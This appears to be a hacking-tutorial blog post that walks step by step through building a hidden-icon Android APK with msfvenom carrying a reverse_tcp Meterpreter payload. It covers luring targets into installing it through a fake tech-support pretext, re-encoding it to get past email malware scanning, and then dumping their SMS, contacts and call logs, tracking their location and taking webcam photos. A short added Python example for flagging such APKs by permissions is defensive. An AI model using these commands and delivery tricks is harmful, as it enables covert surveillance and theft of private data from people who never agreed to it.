Metasploit Basics, Part 13: Exploiting Android Mobile Devices (Updated)


Welcome back, my budding hackers!

The growth of the mobile device market has been dramatic over the past 10 years. Since the market's birth in 2007 with the advent of the Apple phone, mobile devices have grown to comprise over 50% of all web traffic in 2020. There are 5B mobile devices on the planet, or about one for 3/4 of the world’s population. Of these mobile devices, 75% use the Android operating system. With this market dominance of Android, it is fitting that we focus our mobile hacking on this dominant operating system.

In this tutorial, we will be using Metasploit to exploit Android devices such as tablets and phones. As you will see, once we have exploited the Android device, we are capable of collecting the target’s text messages, contact list and location, and even turning on their webcam!

As of 2020, the malicious app is still the most common method of compromising Android mobile devices, with nearly 80% of all attacks a result of these apps. Android users are increasingly finding a need to install 3rd party apps as they want to try different and unique applications not available in the Google Play store.

Android users can enable the download and installation of 3rd party apps by simply following the steps below.

1. Open your Android device Settings.

2. Select the Apps and Notifications option.

3. Enable the “Unknown Sources” option.

Note: If you can’t find this option under the Apps and Notifications tab, look for it in the device’s Security section.

In this tutorial, we will develop our own malicious APK, which must then be installed by the user from a 3rd party app source or physically installed by the attacker.

Step #1: Find Android Exploits

The first step is to search Metasploit for Android exploits.

There are numerous exploits within Metasploit for hacking Android. A quick search reveals the following exploits:

msf > search type:exploit platform:android

As you can see, there are at least 12 exploits for Android operating systems in Metasploit.

Step #2: Find Android Payloads

As you have seen in previous Metasploit Basics tutorials, Metasploit has numerous payloads and those payloads are specific to the operating system and exploit. If we want to exploit an Android system, then we will need an Android payload.

We can find Android-specific payloads by searching:

msf > search type:payload platform:android

As you can see, there are numerous Android-specific payloads, including payload/android/meterpreter/reverse_tcp, which we will be using here, but the others can be used as well.

Step #3: Build an APK file

One of the easiest ways to exploit an Android system is to create an .apk (Android PacKage) file and have the target install it on their Android phone or tablet. This is usually done through physical access to their phone or through social engineering (“Hello, this is tech support. We have detected unusual activity on your phone and need to install a tech support app to monitor this activity…” etc).

As we learned here in Metasploit Basics, Part 9, we can use the msfvenom utility in Metasploit to create custom payloads. In this case, we will convert the payload/android/meterpreter/reverse_tcp into an Android .apk file.

To do so, enter the following command.

msf > msfvenom -p android/meterpreter/reverse_tcp AndroidHideAppIcon=true AndroidWakeLock=true LHOST=192.168.1.101 LPORT=6996 -f raw -o HackersAriseMalwareApp.apk

Where:

msfvenom: the command to create the malicious payload

-p android/meterpreter/reverse_tcp: the name of the Android payload

AndroidHideAppIcon=true: this option hides the app’s icon from the user

AndroidWakeLock=true: this option keeps the phone from going to “sleep”

LHOST=192.168.1.101: this is the IP address of the attacker (Kali)

LPORT=6996: this is the port to communicate back to the attacker

-f raw: this creates the payload in raw format (-f)

-o HackersAriseMalwareApp.apk: this is the name of the app to output (-o)

Note that the output complains that “No Platform was Selected” and “No arch selected”, but msfvenom is smart enough to know from the payload that you selected that the platform is Android and the architecture is Dalvik.

For more on how to use msfvenom to create custom payloads, see my tutorial here.

Step #4: Set Up a Multi Handler Listener

Now that we have the .apk built with the Android payload embedded, we need to open a listener on our system to accept the connection from the HackersAriseMalwareApp.apk when it is installed and executed. In Metasploit Basics, Part 12, we set up an .rc script to automatically start and open a listener to accept outside connections to our Metasploit. If you created that script, you can now start it by entering:

msf > resource handler_http.rc

If you don’t have a listener script, you can start a listener by entering the following commands:

msf > use exploit/multi/handler

msf > set PAYLOAD android/meterpreter/reverse_tcp

msf > set LHOST 192.168.1.101

msf > set LPORT 6996

msf > exploit

You must make certain that the PAYLOAD, LPORT and LHOST are the same as the ones you used when creating your .apk file in msfvenom.

Step #5: Deliver the HackersAriseMalwareApp.apk to the Target

The next step, of course, is to deliver the .apk file to the target’s mobile device. If you have physical access to the device, simply install the HackersAriseMalwareApp.apk. Otherwise, you will need to send it to the target via email or DropBox or other means. It’s important to note that this file will likely be flagged by Gmail and other email services as malware. As a result, consider re-encoding the payload with OWASP-ZSC or other obfuscation software such as shellter or Veil-Evasion.

In addition, you might consider hosting the .apk on your own website and encourage people to download it.

Step #6: Exploiting the Target System

Once the target installs the .apk, we should get a meterpreter prompt like below. We can then enter the command sysinfo to verify we are on the Android device!

meterpreter > sysinfo

We can then enter help to see all the Android meterpreter commands.

meterpreter > help

Note that from the Android meterpreter we have unique options such as:

dump_calllog

dump_contacts

dump_sms

geolocate

send_sms

These commands give us the power to see just about anything the target is doing on this device, as well as to find their location. This meterpreter is also capable of using some of the other standard meterpreter commands such as:

record_mic

webcam_snap

webcam_stream
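
From the defender's side, each of the commands above only returns data if the installed app has the matching Android permission, so an APK's declared permissions are a quick triage signal. The Python below is an added example, not part of the original tutorial: it parses `aapt dump badging` output, and the command-to-permission mapping, the threshold of 4 and both sample inputs are this example's own assumptions and constructed data.

```python
import re

# Permission each Meterpreter command named above depends on
# (mapping is this example's assumption, not taken from the tutorial).
CAPABILITY_PERMS = {
    "dump_sms": {"android.permission.READ_SMS"},
    "send_sms": {"android.permission.SEND_SMS"},
    "dump_contacts": {"android.permission.READ_CONTACTS"},
    "dump_calllog": {"android.permission.READ_CALL_LOG"},
    "geolocate": {"android.permission.ACCESS_FINE_LOCATION",
                  "android.permission.ACCESS_COARSE_LOCATION"},
    "record_mic": {"android.permission.RECORD_AUDIO"},
    "webcam_snap": {"android.permission.CAMERA"},
}
# Matches both aapt styles: name='x.y.Z' and the older bare x.y.Z form.
PERM_RE = re.compile(r"^uses-permission(?:-sdk-\d+)?:\s*(?:name=)?'?([\w.]+)")

def requested_permissions(badging_text):
    """Return the set of permissions declared in `aapt dump badging` text."""
    found = (PERM_RE.match(line.strip()) for line in badging_text.splitlines())
    return {m.group(1) for m in found if m}

def surveillance_capabilities(badging_text):
    """List the tutorial's commands that the declared permissions enable."""
    perms = requested_permissions(badging_text)
    return sorted(c for c, need in CAPABILITY_PERMS.items() if perms & need)

def is_suspicious(badging_text, threshold=4):
    """Flag apps covering `threshold` or more capabilities (assumed cut-off)."""
    return len(surveillance_capabilities(badging_text)) >= threshold

# Constructed sample inputs (hypothetical package names), not real scan output.
SAMPLE_SUPPORT_APP = """package: name='com.example.techsupport' versionCode='1'
uses-permission: name='android.permission.INTERNET'
uses-permission: name='android.permission.READ_SMS'
uses-permission: name='android.permission.SEND_SMS'
uses-permission: name='android.permission.READ_CONTACTS'
uses-permission: name='android.permission.ACCESS_FINE_LOCATION'
uses-permission: name='android.permission.RECORD_AUDIO'
uses-permission: name='android.permission.CAMERA'
"""
SAMPLE_FLASHLIGHT = """package: name='com.example.flashlight' versionCode='3'
uses-permission: name='android.permission.CAMERA'
uses-permission: android.permission.WAKE_LOCK
"""

if __name__ == "__main__":
    for name, text in (("support", SAMPLE_SUPPORT_APP), ("flashlight", SAMPLE_FLASHLIGHT)):
        print(name, is_suspicious(text), surveillance_capabilities(text))
```

A hit is a reason to inspect a sideloaded app more closely, since messaging and camera apps legitimately request several of these permissions.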

Step #7: Gathering Data from the Android Device

Let’s start by getting the target’s text messages.

meterpreter > dump_sms

Now, let’s get their contacts list.

meterpreter > dump_contacts

Finally, let’s try listing their webcams so that we can later snap pictures from them.

meterpreter > webcam_list

Now that we have the list of webcams on the device, we can use the meterpreter command webcam_snap followed by the number of the webcam to take pictures of the target from the back camera.

meterpreter > webcam_snap 1

Conclusion

The world’s most widely used hacking/pentesting platform, Metasploit, has capabilities to exploit just about any system, including Android mobile devices. We can create a malicious .apk file and, when the target installs the app, we can get almost totally unfettered access to their text messages, contacts and webcams!

Look for my new book, “Metasploit Basics for Hackers” coming out fall 2020!